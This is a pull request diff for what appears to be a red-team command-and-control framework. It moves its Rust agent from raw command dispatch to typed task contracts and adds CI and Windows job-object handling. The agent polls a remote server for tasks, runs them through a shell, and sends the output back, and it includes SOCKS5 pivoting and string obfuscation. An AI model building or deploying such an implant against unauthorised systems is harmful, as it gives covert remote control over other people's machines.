### PR TITLE
Replace raw command dispatch with typed task contracts

### DIFF
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -56,20 +56,24 @@ jobs:
           filters: |
             server:
               - '.github/workflows/ci.yml'
+              - 'docs/schemas/**'
               - 'server/**'
             agent:
               - '.github/workflows/ci.yml'
+              - 'docs/schemas/**'
               - 'agent/**'
             static:
               - '.github/workflows/ci.yml'
               - 'install.sh'
               - 'agent/build.sh'
               - 'agent/check_mutation_determinism.sh'
+              - 'docs/schemas/**'
               - 'lab/build_matrix.sh'
               - 'lab/manifest*.json'
               - 'server/web/**'
             format:
               - '.github/workflows/ci.yml'
+              - 'docs/schemas/**'
               - 'server/**'
               - 'agent/**'
 
@@ -122,9 +126,24 @@ jobs:
 
       - name: Check web JavaScript syntax
         run: |
-          for file in server/web/js/*.js; do
+          for file in server/web/js/*.js docs/schemas/*.js; do
             node --check "$file"
           done
+
+      - name: Test web JavaScript contracts
+        run: node --test server/web/js/*.test.js
+
+      - name: Check JSON documents
+        run: |
+          for file in docs/schemas/*.json docs/schemas/examples/*.json lab/manifest*.json; do
+            node -e 'JSON.parse(require("fs").readFileSync(process.argv[1], "utf8"))' "$file"
+          done
+
+      - name: Install pinned JSON Schema validator
+        run: npm install --no-save --package-lock=false --ignore-scripts --no-audit --no-fund ajv@8.17.1 ajv-formats@3.0.1
+
+      - name: Validate Draft 2020-12 contract examples
+        run: node docs/schemas/validate-examples.js
 
   agent:
     name: Rust Agent
@@ -157,6 +176,30 @@ jobs:
 
       - name: Mutation determinism check
         run: ./check_mutation_determinism.sh
+
+  agent-windows:
+    name: Rust Agent (Windows)
+    runs-on: windows-latest
+    needs: changes
+    if: github.event_name == 'workflow_dispatch' || github.event_name == 'merge_group' || github.base_ref == 'main' || github.ref == 'refs/heads/main' || needs.changes.outputs.agent == 'true'
+    defaults:
+      run:
+        working-directory: agent
+    steps:
+      - name: Checkout
+        uses: actions/checkout@v4
+
+      - name: Set up Rust
+        uses: dtolnay/rust-toolchain@stable
+
+      - name: Fetch dependencies
+        run: cargo fetch --locked
+
+      - name: Test
+        run: cargo test --locked
+
+      - name: Build
+        run: cargo build --locked
 
   format:
     name: Format
@@ -194,6 +237,7 @@ jobs:
       - server
       - static
       - agent
+      - agent-windows
       - format
     if: always()
     steps:
@@ -207,6 +251,7 @@ jobs:
             "${{ needs.server.result }}" \
             "${{ needs.static.result }}" \
             "${{ needs.agent.result }}" \
+            "${{ needs.agent-windows.result }}" \
             "${{ needs.format.result }}"; do
             case "$result" in
               success|skipped)

--- a/agent/Cargo.toml
+++ b/agent/Cargo.toml
@@ -32,7 +32,7 @@ default = []
 dll = []  # Feature flag for DLL exports
 
 [target.'cfg(windows)'.dependencies]
-winapi = { version = "0.3.9", features = ["winuser", "libloaderapi"] }
+winapi = { version = "0.3.9", features = ["winuser", "libloaderapi", "jobapi2", "handleapi"] }
 
 [profile.release]
 opt-level = "z"  # Optimize for size

--- a/agent/src/commands/command_shell.rs
+++ b/agent/src/commands/command_shell.rs
@@ -1,10 +1,14 @@
-use crate::commands::obfuscated::xor_obfuscate;
 use crate::config::{validate_c2_base_url, AgentConfig};
 use crate::networking::egress::get_egress_ip;
 use crate::networking::socks5_pivot::Socks5PivotHandler;
 use crate::networking::socks5_pivot_server::Socks5PivotServer;
 use crate::opsec::{determine_agent_mode, AgentMode};
+use crate::tasks::{
+    validate_identifier, Task, TaskOutcome, TaskOutput, TaskResult, TaskStatusUpdate, TaskType,
+    MAX_TASK_ERROR_CHARS, MAX_TASK_OUTPUT_CHARS, TASK_SCHEMA_VERSION,
+};
 use crate::util::random_jitter;
+use chrono::{DateTime, SecondsFormat, Utc};
 use get_if_addrs::get_if_addrs;
 use hostname;
 use log::{debug, error, info, warn};
@@ -12,65 +16,84 @@ use obfstr::obfstr;
 use once_cell::sync::Lazy;
 use os_info;
 use reqwest::{Method, StatusCode, Url};
-use serde::Deserialize;
 use serde_json::{json, Value};
-use std::collections::HashMap;
+use std::collections::{HashMap, VecDeque};
 use std::env;
-use std::io;
+use std::io::{self, Read};
 use std::path::Path;
-use std::process::Command;
+use std::process::{Command, ExitStatus, Stdio};
+use std::sync::mpsc as std_mpsc;
 use std::sync::Arc;
 use std::sync::Mutex;
-use std::time::Duration;
+use std::time::{Duration, Instant};
 use tokio::sync::mpsc;
 use tokio::sync::Mutex as TokioMutex;
 use tokio::task::JoinHandle;
-use tokio::time::timeout;
 
 static PIVOT_SERVERS: Lazy<TokioMutex<HashMap<u16, JoinHandle<()>>>> =
     Lazy::new(|| TokioMutex::new(HashMap::new()));
-static QUEUED_COMMANDS: Lazy<Mutex<Vec<String>>> = Lazy::new(|| Mutex::new(Vec::new()));
+static TASK_OUTBOX: Lazy<TaskOutbox> = Lazy::new(TaskOutbox::default);
 
-// Define the expected structure for the command response JSON
-#[derive(Deserialize)]
-struct CommandResponse {
-    command: String,
-}
+const MAX_CAPTURE_BYTES: usize = MAX_TASK_OUTPUT_CHARS;
+const MAX_RESULT_ERROR_CHARS: usize = MAX_TASK_ERROR_CHARS;
+const OUTPUT_READ_CHUNK_BYTES: usize = 16 * 1024;
+const OUTPUT_CHANNEL_CAPACITY: usize = 16;
+const MAX_OUTPUT_EVENTS_PER_TICK: usize = OUTPUT_CHANNEL_CAPACITY * 2;
+const MAX_TERMINAL_TASK_IDS: usize = 1_024;
 
 #[derive(Clone, Copy)]
-enum C2Endpoint {
+enum C2Endpoint<'a> {
     Heartbeat,
-    Command,
-    Result,
-}
-
-impl C2Endpoint {
-    fn as_segment(self) -> &'static str {
-        match self {
-            Self::Heartbeat => "heartbeat",
-            Self::Command => "command",
-            Self::Result => "result",
-        }
-    }
+    Tasks,
+    Results,
+    TaskStatus(&'a str),
 }
 
 fn build_c2_endpoint_url(
     server_addr: &str,
     agent_id: &str,
-    endpoint: C2Endpoint,
+    endpoint: C2Endpoint<'_>,
 ) -> io::Result<Url> {
+    validate_identifier("agent_id", agent_id)
+        .map_err(|err| io::Error::new(io::ErrorKind::InvalidInput, err))?;
+    if let C2Endpoint::TaskStatus(task_id) = endpoint {
+        validate_identifier("task_id", task_id)
+            .map_err(|err| io::Error::new(io::ErrorKind::InvalidInput, err))?;
+    }
+
     let mut url = validate_c2_base_url(server_addr)
         .map_err(|e| io::Error::new(io::ErrorKind::InvalidInput, e))?;
 
-    url.path_segments_mut()
-        .map_err(|_| io::Error::new(io::ErrorKind::InvalidInput, "C2 URL cannot be a base"))?
+    let mut segments = url
+        .path_segments_mut()
+        .map_err(|_| io::Error::new(io::ErrorKind::InvalidInput, "C2 URL cannot be a base"))?;
+    segments
         .pop_if_empty()
         .push("api")
         .push("agent")
-        .push(agent_id)
-        .push(endpoint.as_segment());
+        .push(agent_id);
+
+    match endpoint {
+        C2Endpoint::Heartbeat => {
+            segments.push("heartbeat");
+        }
+        C2Endpoint::Tasks => {
+            segments.push("tasks");
+        }
+        C2Endpoint::Results => {
+            segments.push("results");
+        }
+        C2Endpoint::TaskStatus(task_id) => {
+            segments.push("tasks").push(task_id).push("status");
+        }
+    }
+    drop(segments);
 
     Ok(url)
+}
+
+fn utc_timestamp() -> String {
+    Utc::now().to_rfc3339_opts(SecondsFormat::Millis, true)
 }
 
 //  Helper function to get current timestamp
@@ -82,17 +105,16 @@ fn now_timestamp() -> u64 {
 }
 
 #[cfg(windows)]
-fn create_command(command: &str, args: &[&str]) -> Command {
+fn create_command(command: &str) -> Command {
     let mut cmd = Command::new("cmd");
     cmd.arg("/C").arg(command);
-    cmd.args(args);
     cmd
 }
 
 #[cfg(not(windows))]
-fn create_command(command: &str, args: &[&str]) -> Command {
-    let mut cmd = Command::new(command);
-    cmd.args(args);
+fn create_command(command: &str) -> Command {
+    let mut cmd = Command::new("sh");
+    cmd.arg("-c").arg(command);
     cmd
 }
 
@@ -118,59 +140,516 @@ fn get_all_local_ips() -> Vec<String> {
     ips
 }
 
-async fn execute_command(cmd_parts: &[&str]) -> io::Result<String> {
+#[derive(Clone, Debug, Eq, PartialEq)]
+struct ShellExecution {
+    stdout: String,
+    stderr: String,
+    exit_code: Option<i32>,
+    error: Option<String>,
+}
+
+impl ShellExecution {
+    fn failed(error: impl Into<String>) -> Self {
+        Self {
+            stdout: String::new(),
+            stderr: String::new(),
+            exit_code: None,
+            error: Some(error.into()),
+        }
+    }
+}
+
+async fn execute_shell(command: &str, timeout_seconds: u64) -> ShellExecution {
+    let deadline = Instant::now() + Duration::from_secs(timeout_seconds);
+    let cmd_parts: Vec<&str> = command.split_whitespace().collect();
     if cmd_parts.is_empty() {
-        return Ok(String::new());
+        return ShellExecution::failed("shell command is empty");
     }
 
-    // Handle cd command specially
     if cmd_parts[0] == "cd" {
-        if cmd_parts.len() > 1 {
-            let dir = cmd_parts[1];
-            let path = Path::new(dir);
+        let result = if cmd_parts.len() > 1 {
+            let path = Path::new(cmd_parts[1]);
             if path.exists() {
-                env::set_current_dir(path)?;
-                return Ok(format!(
-                    "Changed directory to {}",
-                    env::current_dir()?.display()
-                ));
+                env::set_current_dir(path).and_then(|_| {
+                    env::current_dir()
+                        .map(|current| format!("Changed directory to {}", current.display()))
+                })
             } else {
-                return Err(io::Error::new(
+                Err(io::Error::new(
                     io::ErrorKind::NotFound,
                     "Directory not found",
-                ));
+                ))
             }
-        }
-        return Ok(format!(
-            "Current directory: {}",
-            env::current_dir()?.display()
-        ));
-    }
-
-    // Handle other commands with timeout
-    let result = timeout(Duration::from_secs(30), async {
-        let output = if cfg!(windows) {
-            let full_command = cmd_parts.join(" ");
-            create_command(&full_command, &[]).output()?
         } else {
-            create_command(cmd_parts[0], &cmd_parts[1..]).output()?
+            env::current_dir().map(|current| format!("Current directory: {}", current.display()))
         };
 
-        Ok::<_, io::Error>(format!(
-            "{}{}",
-            String::from_utf8_lossy(&output.stdout),
-            String::from_utf8_lossy(&output.stderr)
-        ))
-    })
-    .await;
+        return match result {
+            Ok(stdout) => ShellExecution {
+                stdout,
+                stderr: String::new(),
+                exit_code: Some(0),
+                error: None,
+            },
+            Err(err) => ShellExecution::failed(err.to_string()),
+        };
+    }
 
-    match result {
-        Ok(Ok(output)) => Ok(output),
-        Ok(Err(e)) => Err(e),
-        Err(_) => Err(io::Error::new(
-            io::ErrorKind::TimedOut,
-            "Command timed out after 30 seconds",
-        )),
+    let mut process = create_command(command);
+    process.stdout(Stdio::piped()).stderr(Stdio::piped());
+    #[cfg(unix)]
+    {
+        use std::os::unix::process::CommandExt;
+        process.process_group(0);
+    }
+
+    let mut child = match process.spawn() {
+        Ok(child) => child,
+        Err(err) => return ShellExecution::failed(format!("failed to start command: {err}")),
+    };
+    let process_tree = ProcessTreeGuard::attach(&child);
+    let (output_sender, output_receiver) =
+        std_mpsc::sync_channel::<OutputEvent>(OUTPUT_CHANNEL_CAPACITY);
+    let mut captured = CapturedOutput::default();
+
+    match child.stdout.take() {
+        Some(stdout) => spawn_output_reader(stdout, OutputStream::Stdout, output_sender.clone()),
+        None => captured.mark_unavailable(OutputStream::Stdout),
+    }
+    match child.stderr.take() {
+        Some(stderr) => spawn_output_reader(stderr, OutputStream::Stderr, output_sender.clone()),
+        None => captured.mark_unavailable(OutputStream::Stderr),
+    }
+    drop(output_sender);
+
+    let mut exit_status = None;
+
+    loop {
+        captured.drain(&output_receiver);
+
+        if exit_status.is_none() {
+            match child.try_wait() {
+                Ok(Some(status)) => exit_status = Some(status),
+                Ok(None) => {}
+                Err(err) => {
+                    let mut errors = vec![format!("failed to wait for command: {err}")];
+                    if let Some(termination_error) = process_tree.terminate(&mut child) {
+                        errors.push(termination_error);
+                    }
+                    captured.drain(&output_receiver);
+                    let execution = captured.finish(None, errors);
+                    reap_child_detached(child);
+                    return execution;
+                }
+            }
+        }
+
+        if exit_status.is_some() && captured.is_complete() {
+            let mut errors = Vec::new();
+            if let Some(cleanup_error) = process_tree.cleanup_descendants() {
+                errors.push(cleanup_error);
+            }
+            return captured.finish(exit_status, errors);
+        }
+
+        let now = Instant::now();
+        if now >= deadline {
+            let mut errors = vec![format!("command timed out after {timeout_seconds} seconds")];
+            if let Some(termination_error) = process_tree.terminate(&mut child) {
+                errors.push(termination_error);
+            }
+            captured.drain(&output_receiver);
+            let execution = captured.finish(None, errors);
+            reap_child_detached(child);
+            return execution;
+        }
+
+        tokio::time::sleep((deadline - now).min(Duration::from_millis(10))).await;
+    }
+}
+
+#[derive(Clone, Copy, Debug)]
+enum OutputStream {
+    Stdout,
+    Stderr,
+}
+
+enum OutputEvent {
+    Data(OutputStream, Vec<u8>),
+    Done(OutputStream),
+    Error(OutputStream, String),
+}
+
+#[derive(Default)]
+struct CapturedOutput {
+    stdout: Vec<u8>,
+    stderr: Vec<u8>,
+    stdout_done: bool,
+    stderr_done: bool,
+    stdout_truncated: bool,
+    stderr_truncated: bool,
+    errors: Vec<String>,
+}
+
+impl CapturedOutput {
+    fn mark_unavailable(&mut self, stream: OutputStream) {
+        self.errors
+            .push(format!("command {} pipe was unavailable", stream.label()));
+        self.mark_done(stream);
+    }
+
+    fn mark_done(&mut self, stream: OutputStream) {
+        match stream {
+            OutputStream::Stdout => self.stdout_done = true,
+            OutputStream::Stderr => self.stderr_done = true,
+        }
+    }
+
+    fn push(&mut self, stream: OutputStream, bytes: &[u8]) {
+        let (destination, truncated) = match stream {
+            OutputStream::Stdout => (&mut self.stdout, &mut self.stdout_truncated),
+            OutputStream::Stderr => (&mut self.stderr, &mut self.stderr_truncated),
+        };
+        let remaining = MAX_CAPTURE_BYTES.saturating_sub(destination.len());
+        let accepted = remaining.min(bytes.len());
+        destination.extend_from_slice(&bytes[..accepted]);
+        if accepted < bytes.len() {
+            *truncated = true;
+        }
+    }
+
+    fn drain(&mut self, receiver: &std_mpsc::Receiver<OutputEvent>) {
+        for _ in 0..MAX_OUTPUT_EVENTS_PER_TICK {
+            match receiver.try_recv() {
+                Ok(OutputEvent::Data(stream, bytes)) => self.push(stream, &bytes),
+                Ok(OutputEvent::Done(stream)) => self.mark_done(stream),
+                Ok(OutputEvent::Error(stream, error)) => {
+                    self.errors.push(format!(
+                        "failed to read command {}: {}",
+                        stream.label(),
+                        error
+                    ));
+                    self.mark_done(stream);
+                }
+                Err(std_mpsc::TryRecvError::Empty) => return,
+                Err(std_mpsc::TryRecvError::Disconnected) => {
+                    if !self.stdout_done {
+                        self.errors
+                            .push("command stdout reader stopped unexpectedly".to_string());
+                        self.stdout_done = true;
+                    }
+                    if !self.stderr_done {
+                        self.errors
+                            .push("command stderr reader stopped unexpectedly".to_string());
+                        self.stderr_done = true;
+                    }
+                    return;
+                }
+            }
+        }
+    }
+
+    fn is_complete(&self) -> bool {
+        self.stdout_done && self.stderr_done
+    }
+
+    fn finish(mut self, status: Option<ExitStatus>, mut errors: Vec<String>) -> ShellExecution {
+        errors.append(&mut self.errors);
+        if self.stdout_truncated {
+            errors.push(format!("stdout truncated at {} bytes", MAX_CAPTURE_BYTES));
+        }
+        if self.stderr_truncated {
+            errors.push(format!("stderr truncated at {} bytes", MAX_CAPTURE_BYTES));
+        }
+
+        let exit_code = status.as_ref().and_then(ExitStatus::code);
+        if status.as_ref().is_some_and(|status| !status.success()) {
+            errors.push(exit_status_error(exit_code));
+        }
+
+        let (stdout, stdout_decode_truncated) = decode_bounded_output(&self.stdout);
+        let (stderr, stderr_decode_truncated) = decode_bounded_output(&self.stderr);
+        if stdout_decode_truncated && !self.stdout_truncated {
+            errors.push(format!("stdout truncated at {} bytes", MAX_CAPTURE_BYTES));
+        }
+        if stderr_decode_truncated && !self.stderr_truncated {
+            errors.push(format!("stderr truncated at {} bytes", MAX_CAPTURE_BYTES));
+        }
+
+        ShellExecution {
+            stdout,
+            stderr,
+            exit_code,
+            error: (!errors.is_empty()).then(|| errors.join("; ")),
+        }
+    }
+}
+
+fn decode_bounded_output(bytes: &[u8]) -> (String, bool) {
+    let mut output = String::from_utf8_lossy(bytes).into_owned();
+    if output.len() <= MAX_CAPTURE_BYTES {
+        return (output, false);
+    }
+
+    let mut boundary = MAX_CAPTURE_BYTES;
+    while !output.is_char_boundary(boundary) {
+        boundary -= 1;
+    }
+    output.truncate(boundary);
+    (output, true)
+}
+
+impl OutputStream {
+    fn label(self) -> &'static str {
+        match self {
+            Self::Stdout => "stdout",
+            Self::Stderr => "stderr",
+        }
+    }
+}
+
+fn spawn_output_reader<R>(
+    mut reader: R,
+    stream: OutputStream,
+    sender: std_mpsc::SyncSender<OutputEvent>,
+) where
+    R: Read + Send + 'static,
+{
+    std::thread::spawn(move || {
+        let mut buffer = vec![0u8; OUTPUT_READ_CHUNK_BYTES];
+        loop {
+            match reader.read(&mut buffer) {
+                Ok(0) => {
+                    let _ = sender.send(OutputEvent::Done(stream));
+                    return;
+                }
+                Ok(read) => {
+                    if sender
+                        .send(OutputEvent::Data(stream, buffer[..read].to_vec()))
+                        .is_err()
+                    {
+                        return;
+                    }
+                }
+                Err(err) => {
+                    let _ = sender.send(OutputEvent::Error(stream, err.to_string()));
+                    return;
+                }
+            }
+        }
+    });
+}
+
+fn reap_child_detached(mut child: std::process::Child) {
+    std::thread::spawn(move || {
+        let deadline = Instant::now() + Duration::from_secs(5);
+        loop {
+            match child.try_wait() {
+                Ok(Some(_)) | Err(_) => return,
+                Ok(None) if Instant::now() >= deadline => {
+                    let _ = child.kill();
+                    let _ = child.wait();
+                    return;
+                }
+                Ok(None) => std::thread::sleep(Duration::from_millis(10)),
+            }
+        }
+    });
+}
+
+struct ProcessTreeGuard {
+    pid: u32,
+    #[cfg(windows)]
+    job: Option<WindowsJob>,
+}
+
+impl ProcessTreeGuard {
+    fn attach(child: &std::process::Child) -> Self {
+        Self {
+            pid: child.id(),
+            #[cfg(windows)]
+            job: WindowsJob::attach(child).ok(),
+        }
+    }
+
+    #[cfg(unix)]
+    fn terminate(&self, child: &mut std::process::Child) -> Option<String> {
+        let result = unsafe { libc::kill(-(self.pid as i32), libc::SIGKILL) };
+        if result == 0 {
+            return None;
+        }
+        let group_error = io::Error::last_os_error();
+        if group_error.raw_os_error() == Some(libc::ESRCH) {
+            return child.kill().err().map(|error| error.to_string());
+        }
+        match child.kill() {
+            Ok(()) => Some(format!(
+                "failed to terminate command process group: {}",
+                group_error
+            )),
+            Err(child_error) => Some(format!(
+                "failed to terminate command process group: {}; direct termination also failed: {}",
+                group_error, child_error
+            )),
+        }
+    }
+
+    #[cfg(unix)]
+    fn cleanup_descendants(&self) -> Option<String> {
+        let result = unsafe { libc::kill(-(self.pid as i32), libc::SIGKILL) };
+        if result == 0 {
+            return None;
+        }
+        let error = io::Error::last_os_error();
+        if error.raw_os_error() == Some(libc::ESRCH) {
+            None
+        } else {
+            Some(format!("failed to clean up command process group: {error}"))
+        }
+    }
+
+    #[cfg(windows)]
+    fn terminate(&self, child: &mut std::process::Child) -> Option<String> {
+        if let Some(job) = &self.job {
+            if job.terminate().is_ok() {
+                return None;
+            }
+        }
+        match terminate_windows_tree_bounded(self.pid) {
+            Ok(()) => None,
+            Err(tree_error) => match child.kill() {
+                Ok(()) => Some(format!(
+                    "failed to terminate full command tree: {tree_error}; terminated direct child"
+                )),
+                Err(child_error) => Some(format!(
+                    "failed to terminate full command tree: {tree_error}; direct termination also failed: {child_error}"
+                )),
+            },
+        }
+    }
+
+    #[cfg(windows)]
+    fn cleanup_descendants(&self) -> Option<String> {
+        self.job
+            .as_ref()
+            .and_then(|job| job.terminate().err())
+            .map(|error| format!("failed to clean up command job: {error}"))
+    }
+
+    #[cfg(not(any(unix, windows)))]
+    fn terminate(&self, child: &mut std::process::Child) -> Option<String> {
+        child.kill().err().map(|error| error.to_string())
+    }
+
+    #[cfg(not(any(unix, windows)))]
+    fn cleanup_descendants(&self) -> Option<String> {
+        None
+    }
+}
+
+#[cfg(windows)]
+struct WindowsJob {
+    handle: winapi::um::winnt::HANDLE,
+}
+
+#[cfg(windows)]
+impl WindowsJob {
+    fn attach(child: &std::process::Child) -> io::Result<Self> {
+        use std::os::windows::io::AsRawHandle;
+        use std::{mem, ptr};
+        use winapi::shared::minwindef::FALSE;
+        use winapi::um::jobapi2::{
+            AssignProcessToJobObject, CreateJobObjectW, SetInformationJobObject,
+        };
+        use winapi::um::winnt::{
+            JobObjectExtendedLimitInformation, HANDLE, JOBOBJECT_EXTENDED_LIMIT_INFORMATION,
+            JOB_OBJECT_LIMIT_KILL_ON_JOB_CLOSE,
+        };
+
+        let handle: HANDLE = unsafe { CreateJobObjectW(ptr::null_mut(), ptr::null()) };
+        if handle.is_null() {
+            return Err(io::Error::last_os_error());
+        }
+        let mut limits: JOBOBJECT_EXTENDED_LIMIT_INFORMATION = unsafe { mem::zeroed() };
+        limits.BasicLimitInformation.LimitFlags = JOB_OBJECT_LIMIT_KILL_ON_JOB_CLOSE;
+        let configured = unsafe {
+            SetInformationJobObject(
+                handle,
+                JobObjectExtendedLimitInformation,
+                &mut limits as *mut JOBOBJECT_EXTENDED_LIMIT_INFORMATION as *mut _,
+                mem::size_of::<JOBOBJECT_EXTENDED_LIMIT_INFORMATION>() as u32,
+            )
+        };
+        if configured == FALSE {
+            let error = io::Error::last_os_error();
+            unsafe {
+                winapi::um::handleapi::CloseHandle(handle);
+            }
+            return Err(error);
+        }
+        let assigned = unsafe { AssignProcessToJobObject(handle, child.as_raw_handle() as HANDLE) };
+        if assigned == FALSE {
+            unsafe {
+                winapi::um::handleapi::CloseHandle(handle);
+            }
+            return Err(io::Error::last_os_error());
+        }
+        Ok(Self { handle })
+    }
+
+    fn terminate(&self) -> io::Result<()> {
+        use winapi::shared::minwindef::FALSE;
+        use winapi::um::jobapi2::TerminateJobObject;
+
+        if unsafe { TerminateJobObject(self.handle, 1) } == FALSE {
+            return Err(io::Error::last_os_error());
+        }
+        Ok(())
+    }
+}
+
+#[cfg(windows)]
+impl Drop for WindowsJob {
+    fn drop(&mut self) {
+        unsafe {
+            winapi::um::handleapi::CloseHandle(self.handle);
+        }
+    }
+}
+
+#[cfg(windows)]
+fn terminate_windows_tree_bounded(pid: u32) -> io::Result<()> {
+    let mut killer = Command::new("taskkill")
+        .args(["/PID", &pid.to_string(), "/T", "/F"])
+        .stdout(Stdio::null())
+        .stderr(Stdio::null())
+        .spawn()?;
+    let deadline = Instant::now() + Duration::from_secs(1);
+    loop {
+        match killer.try_wait()? {
+            Some(status) if status.success() => return Ok(()),
+            Some(status) => {
+                return Err(io::Error::other(format!(
+                    "taskkill exited with status {:?}",
+                    status.code()
+                )))
+            }
+            None if Instant::now() >= deadline => {
+                let _ = killer.kill();
+                return Err(io::Error::new(
+                    io::ErrorKind::TimedOut,
+                    "taskkill exceeded its one-second bound",
+                ));
+            }
+            None => std::thread::sleep(Duration::from_millis(10)),
+        }
+    }
+}
+
+fn exit_status_error(exit_code: Option<i32>) -> String {
+    match exit_code {
+        Some(code) => format!("command exited with status {code}"),
+        None => "command terminated without an exit code".to_string(),
     }
 }
 
@@ -255,13 +734,13 @@ pub async fn send_heartbeat_with_client(
             } else {
                 error!("[HTTP] Heartbeat failed with status: {}", response.status());
                 update_c2_failure_state(false); // FAILURE
-                Err(io::Error::new(io::ErrorKind::Other, "Heartbeat failed"))
+                Err(io::Error::other("Heartbeat failed"))
             }
         }
         Err(e) => {
             error!("[HTTP] Heartbeat POST failed: {}", e);
             update_c2_failure_state(false); // FAILURE
-            Err(io::Error::new(io::ErrorKind::Other, e))
+            Err(io::Error::other(e))
         }
     }
 }
@@ -288,15 +767,15 @@ fn build_heartbeat_payload(
     })
 }
 
-// Fetch command from the server
-async fn get_command_with_client(
+// Fetch one typed task from the server.
+async fn get_task_with_client(
     config: &AgentConfig,
     server_addr: &str,
     agent_id: &str,
-) -> io::Result<Option<String>> {
-    let url = build_c2_endpoint_url(server_addr, agent_id, C2Endpoint::Command)?;
+) -> io::Result<Option<Task>> {
+    let url = build_c2_endpoint_url(server_addr, agent_id, C2Endpoint::Tasks)?;
     info!(
-        "[HTTP] Sending command GET to {} (SOCKS5 enabled: {})",
+        "[HTTP] Sending task GET to {} (SOCKS5 enabled: {})",
         url, config.socks5_enabled
     );
     let client = match config.build_http_client() {
@@ -310,108 +789,574 @@ async fn get_command_with_client(
     match client.request(Method::GET, url).send().await {
         Ok(response) => {
             info!(
-                "[HTTP] Command GET response: {} (SOCKS5 enabled: {})",
+                "[HTTP] Task GET response: {} (SOCKS5 enabled: {})",
                 response.status(),
                 config.socks5_enabled
             );
             if response.status() == StatusCode::NO_CONTENT {
-                update_c2_failure_state(true); // SUCCESS (no command)
+                update_c2_failure_state(true);
                 return Ok(None);
             }
             if response.status().is_success() {
-                // Attempt to parse JSON. If it fails, it's still a C2 communication failure *semantically*.
-                match response.json::<CommandResponse>().await {
-                    Ok(cmd_resp) => {
-                        update_c2_failure_state(true); // SUCCESS
-                        Ok(Some(cmd_resp.command))
+                match response.json::<Task>().await {
+                    Ok(task) => {
+                        if let Err(err) = task.validate_for_agent(agent_id) {
+                            error!("[HTTP] Rejected invalid task: {}", err);
+                            update_c2_failure_state(false);
+                            return Err(io::Error::new(io::ErrorKind::InvalidData, err));
+                        }
+                        update_c2_failure_state(true);
+                        Ok(Some(task))
                     }
-                    Err(e) => {
-                        error!("[HTTP] Failed to parse command response JSON: {}", e);
-                        update_c2_failure_state(false); // FAILURE (bad JSON)
+                    Err(err) => {
+                        error!("[HTTP] Failed to parse task response JSON: {}", err);
+                        update_c2_failure_state(false);
                         Err(io::Error::new(
                             io::ErrorKind::InvalidData,
-                            "Invalid JSON response",
+                            format!("invalid task JSON: {err}"),
                         ))
                     }
                 }
             } else {
                 error!(
-                    "[HTTP] Command fetch failed with status: {}",
+                    "[HTTP] Task fetch failed with status: {}",
                     response.status()
                 );
-                update_c2_failure_state(false); // FAILURE (bad HTTP status)
-                Err(io::Error::new(io::ErrorKind::Other, "Command fetch failed"))
+                update_c2_failure_state(false);
+                Err(io::Error::other(format!(
+                    "task fetch failed with status {}",
+                    response.status()
+                )))
             }
         }
-        Err(e) => {
-            error!("[HTTP] Command GET failed: {}", e);
-            update_c2_failure_state(false); // FAILURE
-            Err(io::Error::new(io::ErrorKind::Other, e))
+        Err(err) => {
+            error!("[HTTP] Task GET failed: {}", err);
+            update_c2_failure_state(false);
+            Err(io::Error::other(err))
         }
     }
 }
 
-// Submit result to the server
-async fn submit_result_with_client(
+async fn submit_running_status_with_client(
     config: &AgentConfig,
     server_addr: &str,
     agent_id: &str,
-    command: &str,
-    output: &str,
-) -> io::Result<()> {
-    let url = build_c2_endpoint_url(server_addr, agent_id, C2Endpoint::Result)?;
+    task: &Task,
+    started_at: &str,
+) -> SubmissionOutcome {
+    let url = match build_c2_endpoint_url(server_addr, agent_id, C2Endpoint::TaskStatus(&task.id)) {
+        Ok(url) => url,
+        Err(err) => return SubmissionOutcome::Permanent(err.to_string()),
+    };
+    let update = TaskStatusUpdate::running(task, started_at.to_string());
+    if let Err(err) = update.validate() {
+        return SubmissionOutcome::Permanent(err.to_string());
+    }
     info!(
-        "[HTTP] Sending result POST to {} (SOCKS5 enabled: {})",
+        "[HTTP] Sending running status POST to {} (SOCKS5 enabled: {})",
         url, config.socks5_enabled
     );
     let client = match config.build_http_client() {
         Ok(client) => client,
         Err(e) => {
             update_c2_failure_state(false);
-            return Err(io::Error::other(e));
+            return SubmissionOutcome::Permanent(e.to_string());
         }
     };
-    let obfuscated_output = xor_obfuscate(output, agent_id);
-    let data = json!({
-        "command": command,
-        "output": obfuscated_output
-    });
 
-    match client.request(Method::POST, url).json(&data).send().await {
+    match client.request(Method::POST, url).json(&update).send().await {
         Ok(response) => {
             info!(
-                "[HTTP] Result POST response: {} (SOCKS5 enabled: {})",
+                "[HTTP] Running status POST response: {} (SOCKS5 enabled: {})",
                 response.status(),
                 config.socks5_enabled
             );
-            if response.status().is_success() {
-                update_c2_failure_state(true); // SUCCESS
-                Ok(())
+            let outcome = classify_submission_status(response.status(), "running status");
+            if matches!(outcome, SubmissionOutcome::Accepted) {
+                update_c2_failure_state(true);
             } else {
                 error!(
-                    "[HTTP] Result submission failed with status: {}",
+                    "[HTTP] Running status submission failed with status: {}",
                     response.status()
                 );
-                update_c2_failure_state(false); // FAILURE
-                Err(io::Error::new(
-                    io::ErrorKind::Other,
-                    "Result submission failed",
-                ))
+                update_c2_failure_state(false);
             }
+            outcome
         }
-        Err(e) => {
-            error!("[HTTP] Result POST failed: {}", e);
-            update_c2_failure_state(false); // FAILURE
-            Err(io::Error::new(io::ErrorKind::Other, e))
+        Err(err) => {
+            error!("[HTTP] Running status POST failed: {}", err);
+            update_c2_failure_state(false);
+            SubmissionOutcome::Retryable(err.to_string())
         }
     }
 }
 
-fn is_weak_command(cmd: &str) -> bool {
-    let quiet = [obfstr!("ping").to_string(), obfstr!("echo").to_string()];
-    quiet
-        .iter()
-        .any(|q| starts_with_command_token(cmd, q.as_str()))
+async fn submit_task_result_with_client(
+    config: &AgentConfig,
+    server_addr: &str,
+    agent_id: &str,
+    result: &TaskResult,
+) -> SubmissionOutcome {
+    let url = match build_c2_endpoint_url(server_addr, agent_id, C2Endpoint::Results) {
+        Ok(url) => url,
+        Err(err) => return SubmissionOutcome::Permanent(err.to_string()),
+    };
+    if let Err(err) = result.validate() {
+        return SubmissionOutcome::Permanent(err.to_string());
+    }
+    if result.agent_id != agent_id {
+        return SubmissionOutcome::Permanent(
+            "task result agent_id does not match runtime agent".to_string(),
+        );
+    }
+
+    info!(
+        "[HTTP] Sending typed result POST to {} (SOCKS5 enabled: {})",
+        url, config.socks5_enabled
+    );
+    let client = match config.build_http_client() {
+        Ok(client) => client,
+        Err(err) => {
+            update_c2_failure_state(false);
+            return SubmissionOutcome::Permanent(err.to_string());
+        }
+    };
+
